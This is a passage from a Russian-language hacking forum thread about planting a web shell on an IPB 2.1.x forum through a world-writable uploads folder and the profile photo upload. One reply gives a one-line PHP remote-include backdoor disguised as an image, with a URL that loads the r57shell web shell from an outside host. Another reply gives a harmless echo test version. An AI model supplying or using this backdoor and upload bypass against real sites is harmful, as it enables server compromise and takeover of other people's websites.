Если папка открыта на запись, то это ещё не значит, что ты прям вот так просто сможешь заливать туда что-то)))) Это можно сделать ТОЛЬКО со стороны сервера, например, через какие-нить бажные скрипты шелл залить в эту папку. Это, если я правильно понимаю -)) Тоесть просто так всё равно ничё это не даёт.
форум ipb 2.1.х папка /uploads/, cmod 777, через загрузку фоты из профиля можно залить типа file.php.jpg в папке переименуецца на photo-1.txt размер загружаемого файла не больше 50 кб, залить шелл реально? или я туплю и мне пойти курить форум дальше? ...
Хм..... если они все переименовываются в txt, то значит txt опеределяется апачем как пхп т.к. фотки ведь отображаются... Шелл должен работать
переименовываются file.php.jpg , а скрипт переименованный в file.jpg пишет Неудачная загрузка. Обратитесь к администрации форума для помощи. шелл весит 100 кб )...нужно что-то поменьше
Сложно подумать =\ Создай файл file.php.jpg С содержимым: PHP: <?php if(isset($_GET['xek'])) include($_GET['xek']); ?> И к картинке своей обращайся file_kartinki.txt?xek=http://ontechad.by.ru/r57shell.php
Стоп! Вообщем создай в файле PHP: <?php if(isset($_GET['xek'])) echo "XEEEEEEEEEK, я с античата!!!!!!!!!"; ?> Аналогично сделай Если ничего не выведет, увы